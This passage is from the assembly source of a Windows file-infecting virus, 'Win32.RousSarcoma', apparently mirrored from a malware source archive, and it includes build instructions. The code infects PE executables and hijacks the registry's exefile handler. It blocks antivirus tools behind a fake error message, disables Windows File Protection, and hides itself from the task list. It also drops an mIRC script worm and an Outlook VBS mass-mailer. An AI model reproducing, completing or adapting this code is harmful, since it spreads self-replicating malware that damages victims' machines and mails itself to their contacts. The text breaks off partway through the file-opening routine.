mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-25 19:45:06 +00:00
1810 lines
53 KiB
NASM
1810 lines
53 KiB
NASM
|
|
|||
|
;
|
|||
|
;
|
|||
|
; .--------------------------------.
|
|||
|
; | |
|
|||
|
; | Win32.RousSarcoma by SnakeByte |
|
|||
|
; | SnakeByte@kryptocrew.de |
|
|||
|
; | www.kryptocrew.de/snakebyte |
|
|||
|
; .__________________________________.
|
|||
|
;
|
|||
|
;
|
|||
|
; This virus was created by the idea of coding a retro virus, which
|
|||
|
; is able too fool with some AV's. I was not able to realize all my ideas,
|
|||
|
; but I think it is some fun. This virus uses some tricks to make disinfection
|
|||
|
; harder. I came to the idea of making a virus which is able to drop itself to
|
|||
|
; the original EXE File, when I saw that most AV's do not detect the first
|
|||
|
; generation of a lot of viruses. Therefore the one part of this virus stays
|
|||
|
; undetected by heuristics. Generally this virus consits of 2 parts. The EXE File
|
|||
|
; Part and the one which is executed with an infected file. It "hooks" the execution
|
|||
|
; of every EXE File and does not execute it if it is an AV. If it is none, it gets
|
|||
|
; infected and started. Before starting the file it also checks if there is an
|
|||
|
; mirc.ini in the same path. If there is one, it drops a mirc script worm. In Addition
|
|||
|
; to this, the virus install itself in the registry to get started every time with windows.
|
|||
|
; It searches the registry for more paths to infect files there. If it can't find more
|
|||
|
; paths it drops a vbs script to send the worm around via Outlook.
|
|||
|
;
|
|||
|
; I am not good at writing so here is an overview of what
|
|||
|
; the virus does :
|
|||
|
;
|
|||
|
;
|
|||
|
; Name : Win32.RousSarcoma
|
|||
|
; Type : PE-Appender by increasing last section
|
|||
|
; Worming : Yes, mIRC Script and VBS Worm
|
|||
|
; Operating System : Win32
|
|||
|
; Author : SnakeByte
|
|||
|
; Payload : None, too boring to write one ;) [ Got some other interesting stuff
|
|||
|
; in mind i want to code as soon as possible ]
|
|||
|
; Virus Size : 8192 Bytes
|
|||
|
; Infection Mark : A-AV
|
|||
|
; Encryption : None
|
|||
|
; Autostart : RunOnce & exefiles
|
|||
|
; Anti-Bait : Does not infect files < 20000 Bytes
|
|||
|
; Anti-Debugging : Yes, against SoftIce and Int 1h tracing
|
|||
|
; Anti-AV : Yes, does not allow the execution of several AV's
|
|||
|
; disables Win2k File Protection
|
|||
|
; Anti-User : Hides itself in files & several different places,
|
|||
|
; is not shown at ctrl-alt-del list
|
|||
|
; Runs at Level : Ring-3, but still infects every EXE File on executing
|
|||
|
; Infects : 10 Files in the current directory,
|
|||
|
; 10 Files in every path stored in this registry Key :
|
|||
|
; HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
|
|||
|
; Every EXE File which gets executed
|
|||
|
;
|
|||
|
; How to compile ( TASM 5.0 ) :
|
|||
|
;
|
|||
|
; tasm32 /z /ml /m3 RousSarc,,;
|
|||
|
; tlink32 -Tpe -c RousSarc,RousSarc,, import32.lib
|
|||
|
; pewrsec RousSarc.EXE
|
|||
|
;
|
|||
|
; ( Make sure that the .EXE is uppercases !! )
|
|||
|
;
|
|||
|
; At the moment there are just 100 Bytes of Code i could add, with the file staying
|
|||
|
; at 8192 Bytes. If I would add more, the file would grow to 12 KB. I decided to
|
|||
|
; keep it small and leave stuff out like encryption or even poly. Maybe it could
|
|||
|
; be optimized on several parts to make it fit with encryption to a 8 KB file,
|
|||
|
; but I don't mind at the moment
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
; Thanks and greetz to :
|
|||
|
;
|
|||
|
; Lord Arz : Did you also finish your EXEFILES "hooking" something ? ;)
|
|||
|
; DukeCS : Heh, when will KC be done ? *fg*
|
|||
|
; Matsad : Sorry, for not coming, but i got no cash and need to see my girlfriend :P
|
|||
|
; Lethal Mind : Heh, where are you ? ;(
|
|||
|
; Ciatrix : Nice that you carry on !
|
|||
|
;
|
|||
|
;
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; ------------------------[ Let's get ready to rumble ]----------------------
|
|||
|
; ***************************************************************************
|
|||
|
|
|||
|
.586p
|
|||
|
.model flat
|
|||
|
jumps ; calculate Jumps
|
|||
|
.radix 16 ; Hexadecimal numbers
|
|||
|
|
|||
|
; define some API's
|
|||
|
extrn ExitProcess:PROC ; Host for EXE-Part
|
|||
|
extrn LoadLibraryA:PROC ; nessesairy to get all other API's in the EXE-Part
|
|||
|
extrn GetProcAddress:PROC ; cause I don't want DLL not found error's
|
|||
|
|
|||
|
extrn MessageBoxA:PROC ; for testing
|
|||
|
|
|||
|
.code
|
|||
|
; Some constants
|
|||
|
VirusSize equ 8192d ; Lenght of EXE-File
|
|||
|
ImageBase equ 400000h ; Imagebase of our TASM generated EXE-File
|
|||
|
|
|||
|
CPart1 equ 600h
|
|||
|
Gap1 equ 0A00h
|
|||
|
|
|||
|
; ###########################################################################
|
|||
|
; -------------------[ This is the first part of the virus ]-----------------
|
|||
|
; ###########################################################################
|
|||
|
Virus:
|
|||
|
; Here do we search for EXE-files and put the
|
|||
|
; entire PE-Virus EXE to the end !
|
|||
|
; we search for the needed api's with GetProcAdress
|
|||
|
; and LoadModuleHandle, so we will not get Problems
|
|||
|
; with missing DLL's or API's
|
|||
|
|
|||
|
mov ebp, 'VA-A' ; place a mark in ebp, to identify this part
|
|||
|
|
|||
|
lea eax, KERNEL32 ; push name of kernel32.dll
|
|||
|
push eax
|
|||
|
call LoadLibraryA ; save Handle
|
|||
|
mov dword ptr [K32Handle], eax
|
|||
|
test eax, eax ; if we failed we stop here
|
|||
|
jz FirstGenHost
|
|||
|
|
|||
|
lea esi, Kernel32Names ; get all API's we need from kernel
|
|||
|
lea edi, XFindFirstFileA
|
|||
|
mov ebx, K32Handle
|
|||
|
push NumberOfKernel32APIS
|
|||
|
pop ecx
|
|||
|
call GetAPI3 ; the procedure is needed in both parts
|
|||
|
|
|||
|
lea eax, advname ; push name of advapi32.dll
|
|||
|
push eax
|
|||
|
call LoadLibraryA ; save Handle
|
|||
|
mov dword ptr [ADVHandle], eax
|
|||
|
test eax, eax ; if we failed we stop here
|
|||
|
jz FirstGenHost
|
|||
|
|
|||
|
lea esi, AdvapiNames ; get all API's we need from kernel
|
|||
|
lea edi, XRegOpenKeyExA
|
|||
|
mov ebx, ADVHandle
|
|||
|
push NumberOfAdvapiAPIS
|
|||
|
pop ecx
|
|||
|
call GetAPI3 ; the procedure is needed in both parts
|
|||
|
|
|||
|
; Lets hide our Application from the CTRL-ALT-DEL List,
|
|||
|
; to prevent us from being detected by a suspicious user ;)
|
|||
|
|
|||
|
; Check if the API is available
|
|||
|
cmp dword ptr [XRegisterServiceProcess],0
|
|||
|
je NoHide
|
|||
|
|
|||
|
; Get ID of our process
|
|||
|
call dword ptr [XGetCurrentProcessId]
|
|||
|
|
|||
|
push 1 ; We want to run as a service
|
|||
|
push eax ; process id
|
|||
|
call dword ptr [XRegisterServiceProcess]
|
|||
|
|
|||
|
NoHide:
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; ---------------------------[ Initialisation ]------------------------------
|
|||
|
; ***************************************************************************
|
|||
|
; Lets do a check on our commandline params,
|
|||
|
; to see, if we got startet with a filename
|
|||
|
; in it --> exefile method
|
|||
|
|
|||
|
call dword ptr [XGetCommandLineA]
|
|||
|
mov dword ptr [CmdLine], eax
|
|||
|
|
|||
|
; the start of the commandline is in eax,
|
|||
|
; we will parse it to the .exe part to see
|
|||
|
; if there is anything afterwards
|
|||
|
CommandReceive1:
|
|||
|
cmp dword ptr [eax],'EXE.'
|
|||
|
je CommandOK1
|
|||
|
inc eax
|
|||
|
jmp CommandReceive1
|
|||
|
|
|||
|
|
|||
|
CommandOK1:
|
|||
|
add eax, 4h ; eax points directly after the <name>.exe
|
|||
|
cmp byte ptr [eax], 0 ; if the Commandline ends here, we do not need
|
|||
|
je SetRunOnceKey ; to care about this ;)
|
|||
|
|
|||
|
add eax, 2h ; skip blanc and "
|
|||
|
mov esi, eax ; save it
|
|||
|
mov dword ptr [SaveBlanc], esi
|
|||
|
|
|||
|
push esi
|
|||
|
call AVNameCheck
|
|||
|
cmp esi, 0
|
|||
|
je AVMessage
|
|||
|
pop esi
|
|||
|
jmp mIRCcheck
|
|||
|
|
|||
|
|
|||
|
AVMessage: ; Arg ! Dirty AV found .. :P
|
|||
|
pop esi ; lets drop a message
|
|||
|
|
|||
|
push 30h ; Style
|
|||
|
push esi
|
|||
|
push offset AVMsg
|
|||
|
push 0
|
|||
|
call MessageBoxA
|
|||
|
jmp SetRunOnceKey
|
|||
|
|
|||
|
AVMsg db "File is corrupted. Can't start program",0
|
|||
|
|
|||
|
PathEnd dd 0h
|
|||
|
|
|||
|
mIRCcheck: ; we search for the path
|
|||
|
pushad
|
|||
|
|
|||
|
push offset PathEnd
|
|||
|
push offset NameBuffer
|
|||
|
push 255d
|
|||
|
push dword ptr [SaveBlanc]
|
|||
|
call dword ptr [XGetFullPathNameA]
|
|||
|
|
|||
|
mov edi, dword ptr [PathEnd]
|
|||
|
mov esi, offset mircINI ; append the mirc.ini to the path
|
|||
|
mov ecx, 9d
|
|||
|
rep movsb ; and now we need to check if the mIRC.ini does exist
|
|||
|
; if it does, we found a mirc script to infect *eg*
|
|||
|
; because we infect it bevore mIRC gets loaded, we do not
|
|||
|
; need to fear the mIRC worm protection
|
|||
|
lea esi, NameBuffer
|
|||
|
call FindFirstFileProc
|
|||
|
cmp eax, -1 ; we did not found the mirc.ini ;(
|
|||
|
je NoMirc
|
|||
|
|
|||
|
push offset NameBuffer ; Write our entry to the file
|
|||
|
push offset MIRCprot
|
|||
|
push offset MOffset
|
|||
|
push offset MIRCrfiles
|
|||
|
call dword ptr [XWritePrivateProfileStringA]
|
|||
|
|
|||
|
mov edi, dword ptr [PathEnd]
|
|||
|
mov esi, offset MIRCprot ; append the RousSarc.ini to the path
|
|||
|
mov ecx, 13d
|
|||
|
rep movsb ; and now we need to check if the mIRC.ini does exist
|
|||
|
|
|||
|
push 0
|
|||
|
push 080h ; normal attribs
|
|||
|
push 2h ; create a new file (always)
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push 0C0000000h ; read + write
|
|||
|
lea eax, NameBuffer ; file we create
|
|||
|
push eax
|
|||
|
Call dword ptr [XCreateFileA]
|
|||
|
cmp eax, 0FFFFFFFFh
|
|||
|
je NoMirc
|
|||
|
|
|||
|
push eax ; save filehandle
|
|||
|
|
|||
|
push 0 ; write script to file
|
|||
|
push offset Write
|
|||
|
push offset EndScript - offset MIRCscript
|
|||
|
push offset MIRCscript
|
|||
|
push Handle
|
|||
|
call dword ptr [XWriteFile]
|
|||
|
|
|||
|
|
|||
|
; Handle is still on the stack, so we close the file
|
|||
|
call dword ptr [XCloseHandle]
|
|||
|
|
|||
|
NoMirc:
|
|||
|
; close the search handle
|
|||
|
push dword ptr [FindHandle]
|
|||
|
call dword ptr [XCloseHandle]
|
|||
|
popad
|
|||
|
|
|||
|
CommandReceive2: ; so we will be able to locate the file and
|
|||
|
cmp byte ptr [eax],'.' ; infect it
|
|||
|
je CommandOK2
|
|||
|
cmp byte ptr [eax],0 ; check if we don't get too far
|
|||
|
je Outbreak
|
|||
|
inc eax
|
|||
|
jmp CommandReceive2
|
|||
|
CommandOK2:
|
|||
|
add eax, 4h
|
|||
|
cmp byte ptr [eax],0
|
|||
|
jne ZeroAfterName
|
|||
|
mov byte ptr [eax+1],0
|
|||
|
ZeroAfterName:
|
|||
|
mov byte ptr [eax],0 ; we place a Zero here, so we can do a findfirst
|
|||
|
; on the filename which is in esi
|
|||
|
|
|||
|
push eax
|
|||
|
push esi
|
|||
|
call FindFirstFileProc
|
|||
|
pop esi ; esi points to start of filename
|
|||
|
pop ebx ; ebx points to the parameters
|
|||
|
|
|||
|
cmp eax, -1 ; file is not there :(
|
|||
|
je Outbreak ; we infect some others
|
|||
|
|
|||
|
|
|||
|
pushad ; save registers
|
|||
|
lea edi, WFD_szFileName
|
|||
|
mov ecx, ebx ; lenght of filename in ecx
|
|||
|
sub ecx, esi
|
|||
|
inc ecx
|
|||
|
rep movsb ; write filename & path there
|
|||
|
|
|||
|
lea esi, WFD_szFileName ; point to filename
|
|||
|
call InfectFile ; infect file
|
|||
|
popad ; restore registers
|
|||
|
|
|||
|
; esi points to start of filename
|
|||
|
; ebx points to the parameters
|
|||
|
mov byte ptr [ebx], " " ; place a blank here
|
|||
|
|
|||
|
xor eax, eax ; let's execute the file
|
|||
|
push offset ProcessInformation
|
|||
|
push offset StartupInfo
|
|||
|
push eax ; lpCurrentDirectory
|
|||
|
push eax ; lpEnvironment
|
|||
|
push eax ; Create_New_Process_Group & Normal_Priority_Class
|
|||
|
push eax ; bInheritHandles
|
|||
|
push eax ; lpThreadAttributes
|
|||
|
push eax ; lpProcessAttributes
|
|||
|
push esi ; filename with commandline
|
|||
|
push eax ; command line
|
|||
|
call dword ptr [XCreateProcessA]
|
|||
|
|
|||
|
|
|||
|
SetRunOnceKey: ; Here we go if we found an AV or got
|
|||
|
; or after executing a program
|
|||
|
; lets add 2 autostart features
|
|||
|
|
|||
|
; Now we store the name of this file in the RunOnce key
|
|||
|
; ( we add our file that regulary, that it will be always there,
|
|||
|
; but nearly noone looks for files in this key *g* )
|
|||
|
push offset RegHandle
|
|||
|
push 001F0000h ; complete access
|
|||
|
push 0h ; reserved
|
|||
|
push offset RunOnceKey ; check if our key exists
|
|||
|
push HKEY_LOCAL_MACHINE ; HKEY_LOCAL_MACHINE
|
|||
|
call dword ptr [XRegOpenKeyExA]
|
|||
|
|
|||
|
cmp eax, 0
|
|||
|
jne CheckOwnKey
|
|||
|
|
|||
|
xor eax, eax ; search for end of Systemdirectory
|
|||
|
lea edi, NameBuffer
|
|||
|
mov ebx, edi
|
|||
|
repnz scasb
|
|||
|
sub ebx, edi
|
|||
|
inc ebx
|
|||
|
|
|||
|
push ebx
|
|||
|
push offset NameBuffer ; Value
|
|||
|
push 1h ; String
|
|||
|
push 0 ; reserved
|
|||
|
push offset Valuename ; value name
|
|||
|
push dword ptr [RegHandle]
|
|||
|
call dword ptr [XRegSetValueExA]
|
|||
|
|
|||
|
push dword ptr [RegHandle]
|
|||
|
call dword ptr [XRegCloseKey]
|
|||
|
|
|||
|
|
|||
|
jmp FirstGenHost
|
|||
|
|
|||
|
SaveBlanc dd 0h
|
|||
|
EXEFilesKey db 'exefile\shell\open\command',0
|
|||
|
EXEFilesValue db 'RousSarc.EXE "%1" %*',0
|
|||
|
EFVSize equ $ - offset EXEFilesValue
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; ------------------------------[ Outbreak ! ]-------------------------------
|
|||
|
; ***************************************************************************
|
|||
|
Outbreak: ; We got no commandline !
|
|||
|
HKEY_CURRENT_USER equ 80000001h
|
|||
|
HKEY_LOCAL_MACHINE equ 80000002h
|
|||
|
; first of all, let's disable the win2k virus protection
|
|||
|
|
|||
|
push offset RegHandle
|
|||
|
push 001F0000h ; complete access
|
|||
|
push 0h ; reserved
|
|||
|
push offset _2kProt ; check if our key exists
|
|||
|
push HKEY_LOCAL_MACHINE ; HKEY_LOCAL_MACHINE
|
|||
|
call dword ptr [XRegOpenKeyExA]
|
|||
|
|
|||
|
test eax, eax ; if we failed opening the key, we return
|
|||
|
jz No2kProt
|
|||
|
|
|||
|
; Value to disable Windows File Protection
|
|||
|
mov dword ptr [RegBuffer], 0ffffff9dh
|
|||
|
|
|||
|
push 4
|
|||
|
push offset RegBuffer ; Value
|
|||
|
push 4h ; REG_DWORD
|
|||
|
push 0 ; reserved
|
|||
|
push offset _2kProtValue ; value name
|
|||
|
push dword ptr [RegHandle]
|
|||
|
call dword ptr [XRegSetValueExA]
|
|||
|
|
|||
|
; Close it again
|
|||
|
push dword ptr [RegHandle]
|
|||
|
call dword ptr [XRegCloseKey]
|
|||
|
|
|||
|
No2kProt: ; Now we will copy ourselfes into the windows directory
|
|||
|
; to be able to respond to every started file
|
|||
|
; we just got the cmd line
|
|||
|
mov eax, dword ptr [CmdLine]
|
|||
|
CommandReceive3:
|
|||
|
cmp dword ptr [eax],'EXE.'
|
|||
|
je CommandOK3
|
|||
|
inc eax
|
|||
|
jmp CommandReceive3
|
|||
|
|
|||
|
|
|||
|
CommandOK3:
|
|||
|
add eax, 4h ; eax points directly after the <name>.exe
|
|||
|
mov byte ptr [eax], 0 ; Place a 0 here to copy the file
|
|||
|
|
|||
|
push 255d
|
|||
|
push offset NameBuffer
|
|||
|
call dword ptr [XGetWindowsDirectoryA]
|
|||
|
|
|||
|
xor eax, eax ; search for end of Systemdirectory
|
|||
|
lea edi, NameBuffer
|
|||
|
repnz scasb
|
|||
|
dec edi
|
|||
|
lea esi, RunOnceName ; Append Filename
|
|||
|
mov ecx, 13d
|
|||
|
rep movsb
|
|||
|
|
|||
|
; Copy our file to the system directory
|
|||
|
push 1
|
|||
|
push offset NameBuffer ; where to store
|
|||
|
push dword ptr [CmdLine] ; existing
|
|||
|
call dword ptr [XCopyFileA]
|
|||
|
|
|||
|
; Lets set the Exefiles Key
|
|||
|
push offset RegHandle
|
|||
|
push 001F0000h ; complete access
|
|||
|
push 0h ; reserved
|
|||
|
push offset EXEFilesKey ; Open It
|
|||
|
push 80000000h ; HKEY_CLASSES_ROOT
|
|||
|
call dword ptr [XRegOpenKeyExA]
|
|||
|
|
|||
|
cmp eax, 0
|
|||
|
jne CheckOwnKey
|
|||
|
|
|||
|
; Let's set our Value
|
|||
|
push EFVSize
|
|||
|
push offset EXEFilesValue ; Value
|
|||
|
push 1h ; String
|
|||
|
push 0h ; reserved
|
|||
|
push 0h ; value name
|
|||
|
push dword ptr [RegHandle]
|
|||
|
call dword ptr [XRegSetValueExA]
|
|||
|
|
|||
|
|
|||
|
push dword ptr [RegHandle]
|
|||
|
call dword ptr [XRegCloseKey]
|
|||
|
|
|||
|
|
|||
|
CheckOwnKey:
|
|||
|
mov dword ptr [RegBuffer], 0h
|
|||
|
|
|||
|
push offset RegHandle
|
|||
|
push 001F0000h ; complete access
|
|||
|
push 0h ; reserved
|
|||
|
push offset MyKey ; check if our key exists
|
|||
|
push HKEY_CURRENT_USER ; HKEY_CURRENT_USER
|
|||
|
call dword ptr [XRegOpenKeyExA]
|
|||
|
|
|||
|
test eax, eax ; if we failed opening the key, we return
|
|||
|
jz KeySet
|
|||
|
|
|||
|
xor eax, eax ; clear eax
|
|||
|
push offset Dispostiton
|
|||
|
push offset RegHandle
|
|||
|
push eax ; security attribs
|
|||
|
push 001F0000h ; complete access
|
|||
|
push eax ; REG_OPTION_NON_VOLATILE
|
|||
|
push eax ; lpClass
|
|||
|
push eax ; reserved
|
|||
|
push offset MyKey ; Subkey
|
|||
|
push HKEY_CURRENT_USER ; HKEY_CURRENT_USER
|
|||
|
call dword ptr [XRegCreateKeyExA]
|
|||
|
|
|||
|
KeySet:
|
|||
|
|
|||
|
push offset RegData2
|
|||
|
push offset RegBuffer
|
|||
|
push offset RegData1
|
|||
|
push 0
|
|||
|
push offset Valuename
|
|||
|
push dword ptr [RegHandle]
|
|||
|
call dword ptr [XRegQueryValueExA]
|
|||
|
; RegBuffer contains now a value after which
|
|||
|
; we decide what to do, but first, we increment the
|
|||
|
; value and save it
|
|||
|
inc dword ptr [RegBuffer] ; Increment Value
|
|||
|
|
|||
|
push 4
|
|||
|
push offset RegBuffer ; Value
|
|||
|
push 4h ; REG_DWORD
|
|||
|
push 0 ; reserved
|
|||
|
push offset Valuename ; value name
|
|||
|
push dword ptr [RegHandle]
|
|||
|
call dword ptr [XRegSetValueExA]
|
|||
|
|
|||
|
; Close the key
|
|||
|
push dword ptr [RegHandle]
|
|||
|
call dword ptr [XRegCloseKey]
|
|||
|
|
|||
|
mov eax, dword ptr [RegBuffer]
|
|||
|
|
|||
|
; Now we decide what to do ( we start with 2 because we just incremented it and i will not do anything after
|
|||
|
; the second start, cause we need one reboot to disable WFP ) :
|
|||
|
;
|
|||
|
; Value - what to do
|
|||
|
;
|
|||
|
; 2 - infect directory 1 of
|
|||
|
; HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
|
|||
|
; 3 - " " 2 " ""
|
|||
|
; 4 - " " 3 " ""
|
|||
|
; 5 - " " 4 " ""
|
|||
|
; 6 - " " 5 " ""
|
|||
|
; ... no more directorys in RegKey ? --> set value to 0
|
|||
|
|
|||
|
|
|||
|
dec eax
|
|||
|
dec eax
|
|||
|
|
|||
|
jz NoRegistryInfection
|
|||
|
push eax
|
|||
|
|
|||
|
push offset RegHandle
|
|||
|
push 001F0000h ; complete access
|
|||
|
push 0h ; reserved
|
|||
|
push offset AppPaths ; App Paths are stored here
|
|||
|
push HKEY_LOCAL_MACHINE ; HKEY_LOCAL_MACHINE
|
|||
|
call dword ptr [XRegOpenKeyExA]
|
|||
|
|
|||
|
pop eax
|
|||
|
|
|||
|
push 255d
|
|||
|
push offset NameBuffer
|
|||
|
push eax ; Key Number we want to retrieve
|
|||
|
push dword ptr [RegHandle]
|
|||
|
call dword ptr [XRegEnumKeyA]
|
|||
|
cmp eax, 0
|
|||
|
jne DropVBSWorm
|
|||
|
|
|||
|
push offset RegHandle2
|
|||
|
push 001F0000h ; complete access
|
|||
|
push 0h ; reserved
|
|||
|
push offset NameBuffer ; App Paths are stored here
|
|||
|
push dword ptr [RegHandle] ; HKEY_LOCAL_MACHINE
|
|||
|
call dword ptr [XRegOpenKeyExA]
|
|||
|
|
|||
|
; Read Vakze
|
|||
|
|
|||
|
mov dword ptr [RegData2], 255d
|
|||
|
|
|||
|
push offset RegData2
|
|||
|
push offset NameBuffer
|
|||
|
push offset RegData1
|
|||
|
push 0
|
|||
|
push offset PathValue
|
|||
|
push dword ptr [RegHandle2]
|
|||
|
call dword ptr [XRegQueryValueExA]
|
|||
|
|
|||
|
push dword ptr [RegHandle2]
|
|||
|
call dword ptr [XRegCloseKey]
|
|||
|
|
|||
|
lea edi, NameBuffer ; Remove ; to get directory
|
|||
|
mov al, ';'
|
|||
|
mov ecx, 254d
|
|||
|
repnz scasb
|
|||
|
dec edi
|
|||
|
mov byte ptr [edi], 0
|
|||
|
|
|||
|
push offset CurrentPath ; Get Current dir and save it
|
|||
|
push 255d
|
|||
|
call dword ptr [XGetCurrentDirectoryA]
|
|||
|
|
|||
|
push offset NameBuffer ; set new directory
|
|||
|
call dword ptr [XSetCurrentDirectoryA]
|
|||
|
|
|||
|
call InfectCurDir ; Infect the directory
|
|||
|
|
|||
|
push offset CurrentPath ; restore old directory
|
|||
|
call dword ptr [XSetCurrentDirectoryA]
|
|||
|
|
|||
|
CloseRegInfection:
|
|||
|
push dword ptr [RegHandle]
|
|||
|
call dword ptr [XRegCloseKey]
|
|||
|
|
|||
|
|
|||
|
NoRegistryInfection:
|
|||
|
|
|||
|
call InfectCurDir ; Infect the current directory
|
|||
|
jmp FirstGenHost
|
|||
|
|
|||
|
|
|||
|
DropVBSWorm: ; Ok, we found no more directorys in the App Paths
|
|||
|
; Registry Key, so we will drop a little VBS Script
|
|||
|
; and execute it, so the virus will also spread with
|
|||
|
; the help of outlook
|
|||
|
push 0
|
|||
|
push 080h ; normal attribs
|
|||
|
push 2h ; create a new file (always)
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push 0C0000000h ; read + write
|
|||
|
lea eax, VBSWorm
|
|||
|
push eax
|
|||
|
Call dword ptr [XCreateFileA]
|
|||
|
cmp eax, 0FFFFFFFFh
|
|||
|
je CloseRegInfection
|
|||
|
|
|||
|
push eax ; save filehandle
|
|||
|
|
|||
|
push 0 ; write script to file
|
|||
|
push offset Write
|
|||
|
push offset EndVBSScript - offset VBSscript
|
|||
|
push offset VBSscript
|
|||
|
push Handle
|
|||
|
call dword ptr [XWriteFile]
|
|||
|
|
|||
|
|
|||
|
; Handle is still on the stack, so we close the file
|
|||
|
call dword ptr [XCloseHandle]
|
|||
|
|
|||
|
xor eax, eax ; let's execute the wormy script
|
|||
|
push offset ProcessInformation
|
|||
|
push offset StartupInfo
|
|||
|
push eax ; lpCurrentDirectory
|
|||
|
push eax ; lpEnvironment
|
|||
|
push eax ; Create_New_Process_Group & Normal_Priority_Class
|
|||
|
push eax ; bInheritHandles
|
|||
|
push eax ; lpThreadAttributes
|
|||
|
push eax ; lpProcessAttributes
|
|||
|
push offset VBSWorm ; filename with commandline
|
|||
|
push eax ; command line
|
|||
|
call dword ptr [XCreateProcessA]
|
|||
|
|
|||
|
|
|||
|
jmp CloseRegInfection
|
|||
|
|
|||
|
VBSscript:
|
|||
|
db 'On Error Resume Next', 13d, 10d
|
|||
|
db 'Dim R', 13d, 10d
|
|||
|
db 'Set RS=CreateObject("Outlook.Application")', 13d, 10d
|
|||
|
db 'For R=1 To 500', 13d, 10d
|
|||
|
db 'Set Mail=RS.CreateItem(0)', 13d, 10d
|
|||
|
db 'Mail.to=RS.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)', 13d, 10d
|
|||
|
db 'Mail.Subject="Funny Thing !"', 13d, 10d
|
|||
|
db 'Mail.Body="Take a look at this and just start laughing !"', 13d, 10d
|
|||
|
db 'Mail.Attachments.Add("C:\RousSarc.EXE")', 13d, 10d
|
|||
|
db 'Mail.Send', 13d, 10d
|
|||
|
db 'Next', 13d, 10d
|
|||
|
db 'RS.Quit', 13d, 10d, 13d, 10d
|
|||
|
EndVBSScript:
|
|||
|
|
|||
|
VBSWorm db 'C:\RousSarc.vbs',0
|
|||
|
|
|||
|
AppPaths db 'SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths',0
|
|||
|
PathValue db 'Path',0
|
|||
|
|
|||
|
RegData2 dd 4h ; Bytes to read in Buffer
|
|||
|
RegBuffer dd 0h ; Buffer
|
|||
|
Valuename db 'RousSarcoma',0
|
|||
|
MyKey db 'RousSarcoma',0
|
|||
|
RegHandle2 dd 0h
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; --------------------------[ Infection current dir ]------------------------
|
|||
|
; ***************************************************************************
|
|||
|
|
|||
|
; We got all we need
|
|||
|
; let's party ;)
|
|||
|
InfectCurDir: ; Infect up to 10 files in the current directory
|
|||
|
; use FindFirstFile / Next to find files
|
|||
|
; 10 files at max.
|
|||
|
mov dword ptr [InfCounter], 10d
|
|||
|
|
|||
|
|
|||
|
lea esi, filemask
|
|||
|
call FindFirstFileProc
|
|||
|
|
|||
|
inc eax
|
|||
|
jz EndInfectCurDir1 ; did we get all ?
|
|||
|
dec eax
|
|||
|
|
|||
|
InfectCurDirFile:
|
|||
|
; Filename in esi
|
|||
|
lea esi, WFD_szFileName
|
|||
|
call InfectFile ; Try it !
|
|||
|
cmp dword ptr [InfCounter], 0h
|
|||
|
jna EndInfectCurDir2
|
|||
|
|
|||
|
call FindNextFileProc
|
|||
|
|
|||
|
test eax, eax
|
|||
|
jnz InfectCurDirFile
|
|||
|
|
|||
|
EndInfectCurDir2: ; close Search - Handle
|
|||
|
|
|||
|
push dword ptr [FindHandle]
|
|||
|
call dword ptr [XFindClose]
|
|||
|
|
|||
|
EndInfectCurDir1:
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; -------------------------[ prepare Infection ]----------------------------
|
|||
|
; ***************************************************************************
|
|||
|
|
|||
|
InfectFile: ; filename is in WFD_szFileName
|
|||
|
; esi shows to this value
|
|||
|
|
|||
|
call AVNameCheck
|
|||
|
cmp esi, 0h
|
|||
|
je NoInfection
|
|||
|
|
|||
|
lea esi, WFD_szFileName
|
|||
|
|
|||
|
; ignore files smaller than 20000 Bytes
|
|||
|
cmp dword ptr [WFD_nFileSizeLow], 20000d
|
|||
|
jbe NoInfection
|
|||
|
; ignore files bigger than 4,3 GB
|
|||
|
cmp dword ptr [WFD_nFileSizeHigh], 0
|
|||
|
jne NoInfection
|
|||
|
|
|||
|
call OpenFile ; Open File
|
|||
|
jc NoInfection ; stop if there are problems
|
|||
|
mov esi, eax
|
|||
|
|
|||
|
call CheckMZSign ; Check for DOS-Stub
|
|||
|
jc Notagoodfile
|
|||
|
|
|||
|
cmp word ptr [eax+3Ch], 0h
|
|||
|
je Notagoodfile
|
|||
|
|
|||
|
xor esi, esi ; get PE-Header
|
|||
|
mov esi, [eax+3Ch]
|
|||
|
; Check if file is corrupted
|
|||
|
cmp dword ptr [WFD_nFileSizeLow], esi
|
|||
|
jb Notagoodfile
|
|||
|
|
|||
|
add esi, eax
|
|||
|
mov edi, esi
|
|||
|
call CheckPESign ; Check for PE-Header
|
|||
|
jc Notagoodfile
|
|||
|
; Check Infection Mark
|
|||
|
; --> A-AV ( Anti- Anti-Virus )
|
|||
|
|
|||
|
cmp dword ptr [esi+4Ch], 'VA-A'
|
|||
|
jz Notagoodfile
|
|||
|
|
|||
|
mov bx, word ptr [esi+16h]; Get Characteristics
|
|||
|
and bx, 0F000h ; select Dll-Flag
|
|||
|
cmp bx, 02000h
|
|||
|
je Notagoodfile ; we won't no DLL Files
|
|||
|
|
|||
|
mov bx, word ptr [esi+16h]; Check for DLL-Files
|
|||
|
and bx, 00002h
|
|||
|
cmp bx, 00002h
|
|||
|
jne Notagoodfile
|
|||
|
|
|||
|
call InfectEXE ; Infect this sucker !
|
|||
|
jc NoInfection
|
|||
|
|
|||
|
Notagoodfile:
|
|||
|
call UnMapFile
|
|||
|
|
|||
|
NoInfection:
|
|||
|
ret
|
|||
|
|
|||
|
; ***************************************************************************
|
|||
|
; ------------------------------[ File-Handling ]----------------------------
|
|||
|
; ***************************************************************************
|
|||
|
; FileName needs to be in esi
|
|||
|
OpenFile:
|
|||
|
xor eax,eax ; Open Files
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 3h
|
|||
|
push eax
|
|||
|
inc eax
|
|||
|
push eax
|
|||
|
